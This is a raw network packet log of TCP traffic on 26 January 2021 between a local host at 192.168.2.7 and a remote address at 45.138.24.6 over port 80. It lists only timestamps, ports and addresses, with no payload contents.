Jan 26, 2021 19:45:02.244177103 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.244231939 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.293508053 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.293601990 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.293647051 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.293693066 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.293788910 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.293839931 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.344511986 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.344579935 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.344783068 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.344836950 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.345451117 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.345525980 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.393707037 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.393785954 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.442703009 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.442770958 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.457189083 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.457310915 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.506359100 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.506439924 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.506783962 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.506843090 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.555635929 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.555736065 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.555901051 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.555959940 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.604881048 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.604899883 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.604954004 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.604980946 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.606220961 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.606281042 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.656563997 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.656622887 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.656645060 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.656693935 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.657418966 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.658729076 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.705693960 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.706621885 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.707894087 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.707941055 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.708008051 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.756992102 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.757021904 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.757081985 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.757118940 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.757193089 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.760775089 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.806804895 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.806889057 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.809995890 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.810055971 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.925360918 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.925479889 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:02.974529982 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:02.974628925 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.023902893 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.023930073 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.024050951 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.074656010 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.074692965 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.074810028 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.074835062 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.123791933 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.124037981 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.124134064 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.124183893 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.126199007 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.126298904 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.173218012 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.173244953 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.173326969 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.175636053 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.175997019 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.222651005 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.222675085 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.222759962 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.225451946 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.226389885 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.276174068 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.276204109 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.276523113 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.276547909 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.277477980 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.277929068 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.327914953 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.328017950 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.377557039 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.377974033 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.428489923 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.428575039 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.428627968 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.428709030 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.479634047 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.479717016 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.479832888 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.480021954 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.480057001 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.480156898 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.529203892 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.529274940 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.529429913 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.529606104 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.530786991 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.578759909 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.578903913 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.628732920 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.628796101 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.641360998 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.641491890 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.692897081 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.692976952 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.693130970 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.693147898 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.742115021 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.742237091 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.743098021 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.743426085 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.791363955 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.791403055 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.791543961 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.791563034 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.793311119 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.794471979 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.842873096 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.842906952 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.843005896 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.843029022 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.845823050 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.846098900 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.892121077 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.892187119 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.892420053 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.897412062 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.902188063 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.941560984 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.941684008 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:03.951570034 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:03.952198029 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.065740108 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.065897942 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.114990950 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.115267038 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.164458990 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.164520979 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.164665937 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.213608980 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.213747978 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.218936920 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.218991041 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.268115997 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.268189907 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.268404007 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.268472910 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.268520117 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.318732977 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.318892956 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.319113016 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.319278002 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.370769024 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.370925903 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.371144056 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.371279955 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.420259953 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.420661926 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.420748949 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.420768976 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.421087027 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.423082113 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.472050905 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.473206997 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.522259951 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.522358894 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.571316957 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.571476936 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.571970940 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.623830080 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.623979092 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.624070883 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.624090910 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.624222040 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.624294043 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.675381899 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.675556898 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.675590992 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.675622940 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.675975084 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.676047087 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.724545002 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.724706888 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.773600101 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.773761034 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.787147045 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.787251949 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.839508057 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.839556932 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.839651108 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.839701891 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.888675928 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:04.888853073 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.908432961 CET	49761	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:04.957444906 CET	80	49761	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:05.002677917 CET	49762	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:05.093799114 CET	80	49762	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:05.117295980 CET	80	49762	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:05.117536068 CET	49762	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:05.118623018 CET	49762	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:05.167498112 CET	80	49762	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.045491934 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.045675039 CET	49769	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.094700098 CET	80	49769	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.094733953 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.094825029 CET	49769	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.094897032 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.107569933 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.199011087 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.533607960 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.533708096 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.534074068 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.534145117 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.534501076 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.534590006 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.574595928 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.574726105 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.574986935 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.575082064 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.683124065 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.683235884 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.734744072 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.735580921 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.784720898 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.784862995 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.784893990 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.785079956 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.834827900 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.834983110 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.835005999 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.835064888 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.835467100 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.835556030 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.884109974 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.884231091 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.884448051 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.888560057 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.937834978 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.938879967 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:09.988050938 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.988240004 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:09.989590883 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.038803101 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.039217949 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.039407969 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.039539099 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.040728092 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.040756941 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.091022015 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.091270924 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.091305017 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.091381073 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.091533899 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.091609001 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.091794014 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.091861963 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.140398979 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.140549898 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.140846968 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.140937090 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.140985966 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.141088963 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.141452074 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.190052986 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.190160036 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.190845013 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.190974951 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.192424059 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.241493940 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.241689920 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.290839911 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.290992975 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.339993000 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.340151072 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.340193987 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.340270996 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.389667034 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.389734983 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.389856100 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.389966965 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.390039921 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.439292908 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.439351082 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.439498901 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.439560890 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.439600945 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.439605951 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.488745928 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.488892078 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.489042044 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.489207029 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.489283085 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.538613081 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.539060116 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.539150000 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.539494991 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.539550066 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.539582014 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.588721991 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.589065075 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.638289928 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.638370037 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.688013077 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.688173056 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.688174009 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.688236952 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.737261057 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.737468004 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.737587929 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.737701893 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.737771034 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.737788916 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.786797047 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.786887884 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.786891937 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.786946058 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.787409067 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.787483931 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.836843014 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.840415001 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.889729023 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.889913082 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.903434992 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.904007912 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.953237057 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.953341961 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:10.953542948 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:10.953567982 CET	49770	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:11.003859043 CET	80	49770	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:11.004041910 CET	80	49770	45.138.24.6	192.168.2.7
